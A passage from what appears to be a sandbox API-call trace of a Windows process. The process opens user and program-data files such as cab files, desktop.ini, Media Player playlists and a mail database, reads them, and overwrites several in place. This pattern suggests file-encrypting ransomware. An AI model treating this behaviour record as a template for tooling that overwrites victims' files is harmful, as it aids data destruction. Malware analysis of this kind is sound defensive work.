(hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.056] ReleaseMutex (hMutex=0x168) returned 1 [0181.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0181.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0181.056] ReadFile (in: hFile=0x204, lpBuffer=0x28992f8, nNumberOfBytesToRead=0x6f8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x28992f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x6f8, lpOverlapped=0x0) returned 1 [0181.056] CloseHandle (hObject=0x204) returned 1 [0181.057] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.057] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.057] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6f2 [0181.057] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.057] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.057] ReleaseMutex (hMutex=0x168) returned 1 [0181.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0181.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0181.057] ReadFile (in: hFile=0x204, lpBuffer=0x28992f8, nNumberOfBytesToRead=0x6f2, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x28992f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x6f2, lpOverlapped=0x0) returned 1 [0181.058] CloseHandle (hObject=0x204) returned 1 [0181.058] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.058] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.058] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x816 [0181.058] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.059] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.059] ReleaseMutex (hMutex=0x168) returned 1 [0181.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0181.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0181.059] ReadFile (in: hFile=0x204, lpBuffer=0x2876dd8, nNumberOfBytesToRead=0x816, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2876dd8*, lpNumberOfBytesRead=0x2fdf2bc*=0x816, lpOverlapped=0x0) returned 1 [0181.059] CloseHandle (hObject=0x204) returned 1 [0181.059] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.059] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.060] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4f6f26 [0181.060] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.060] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.060] ReleaseMutex (hMutex=0x168) returned 1 [0181.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0181.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0181.060] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.061] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.061] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.061] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4f4f26 [0181.062] ReadFile (in: hFile=0x204, lpBuffer=0x2893278, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2893278*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.062] CloseHandle (hObject=0x204) returned 1 [0181.062] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.062] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.062] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4ea9a0 [0181.063] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.063] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.063] ReleaseMutex (hMutex=0x168) returned 1 [0181.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0181.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0181.063] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.064] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.064] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.064] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4e89a0 [0181.064] ReadFile (in: hFile=0x204, lpBuffer=0x2893278, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2893278*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.064] CloseHandle (hObject=0x204) returned 1 [0181.064] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.065] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.065] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x59c36d [0181.065] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.065] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.065] ReleaseMutex (hMutex=0x168) returned 1 [0181.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0181.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0181.065] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.066] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.066] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.067] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x59a36d [0181.067] ReadFile (in: hFile=0x204, lpBuffer=0x2893278, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2893278*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.067] CloseHandle (hObject=0x204) returned 1 [0181.067] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.068] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.068] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4b4aa8 [0181.068] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.068] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.068] ReleaseMutex (hMutex=0x168) returned 1 [0181.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0181.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0181.068] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.069] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0181.069] ReadFile (in: hFile=0x204, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.069] SetFilePointer (in: hFile=0x204, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4b2aa8 [0181.070] ReadFile (in: hFile=0x204, lpBuffer=0x2893278, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2893278*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0181.070] CloseHandle (hObject=0x204) returned 1 [0181.070] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.071] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.071] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x43 [0181.071] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.071] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.072] ReleaseMutex (hMutex=0x168) returned 1 [0181.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0181.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0181.072] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2fdf2bc*=0x43, lpOverlapped=0x0) returned 1 [0181.073] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0181.073] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0181.074] CloseHandle (hObject=0x204) returned 1 [0181.074] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.075] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.075] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4ff [0181.075] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.075] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.076] ReleaseMutex (hMutex=0x168) returned 1 [0181.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02_Music_added_in_the_last_month.wpl", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0181.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02_Music_added_in_the_last_month.wpl", cchWideChar=36, lpMultiByteStr=0x1fa538c, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="02_Music_added_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 36 [0181.076] ReadFile (in: hFile=0x204, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4ff, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2fdf2bc*=0x4ff, lpOverlapped=0x0) returned 1 [0181.091] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0181.091] WriteFile (in: hFile=0x204, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xa87, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf2d0*=0xa87, lpOverlapped=0x0) returned 1 [0181.091] CloseHandle (hObject=0x204) returned 1 [0181.091] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0181.092] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.093] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x427 [0181.093] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0181.093] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.093] ReleaseMutex (hMutex=0x168) returned 1 [0181.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="10_All_Music.wpl", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0181.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="10_All_Music.wpl", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="10_All_Music.wpl", lpUsedDefaultChar=0x0) returned 16 [0181.093] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x427, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2fdf2bc*=0x427, lpOverlapped=0x0) returned 1 [0182.378] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0182.378] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9af, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x9af, lpOverlapped=0x0) returned 1 [0182.378] CloseHandle (hObject=0x204) returned 1 [0182.379] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0182.379] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.379] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0182.380] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0182.380] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.380] ReleaseMutex (hMutex=0x168) returned 1 [0182.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edb.chk", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 